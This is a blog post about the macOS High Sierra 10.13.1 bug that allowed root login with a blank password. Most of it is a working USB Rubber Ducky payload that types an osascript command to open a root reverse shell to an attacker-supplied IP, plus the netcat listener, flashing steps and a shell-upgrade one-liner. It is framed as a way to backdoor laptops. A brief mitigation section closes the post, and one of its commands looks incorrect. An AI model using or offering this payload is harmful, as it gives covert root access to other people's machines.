So You Want To Play With Ducks?

3 minute read Published:

Blog Post by Aladdin Mubaied

Today, we all heard the news about the serious security bug in macOS. Basically, anyone running the latest version of macOS High Sierra 10.13.1 is vulnerable.

What is the bug?

So if you simply type “root” as a username, leave the password field blank in your login screen, click “unlock” button twice, you’ll immediately gain full root access on any macOS machine.

Rubber Ducky

I thought it will be interesting to write a rubber ducky script for red teamers to backdoor laptops with root access :)

First, you need to get a rubber ducky.

The next step is to load the script on your rubber ducky. Create a file called payload.txt and add the following script:

$ touch payload.txt
REM Script for creating a root backdoor on macOS based on High Sierra bug (https://twitter.com/lemiorhan/status/935578694541770752).
REM Catch the shell with 'nc -l -p 1337' and change IP to your site or IP address
REM osascript based on https://twitter.com/duo_labs/status/935607023026229249
DELAY 1000
GUI SPACE
STRING terminal
DELAY 500
ENTER
DELAY 500
STRING osascript -e 'do shell script "bash -i >& /dev/tcp/{IP}/1337 0>&1" with administrator privileges user name "root" password ""'
ENTER
DELAY 200
GUI q

On your server run the following command to catch the shell:

$ nc -l -p 1337

Make sure you change the {IP} in the script above with your server IP/Hostname.

Rubber ducky will simply load the script and invoke keystrokes by emulating a keyboard. The osascript executes appleScripts and invoke a shell as root by taking advantage of the macOS bug.

Flash your Ducky

In order to run the script above you need to compile and flash your rubber ducky payload.txt. First, you need to download the decoder and run the encode command:

$ java -jar duckencode.jar -i payload.txt -o payload.bin -l fr

Now copy the payload.bin to your rubber ducky sdcard and enjoy your root shell! wooooot!

To spawn a psuedo-terminal after getting the shell run the following command:

python -c 'import pty; pty.spawn("/bin/bash")'  

What to do to protect myself?

There are a couple of things you can actually do:

1) You need to a set a strong password for your “root” account, run:

$ sudo passwd -u root 

2) Make sure you don’t allow SSH access with root account to your machine. Check the following:

 System Preferences->Sharing->Remote Login is disabled/unchecked 

3) You can also disable root user, run:

$ dsenableroot -d -u adminaccount -p adminaccountpassword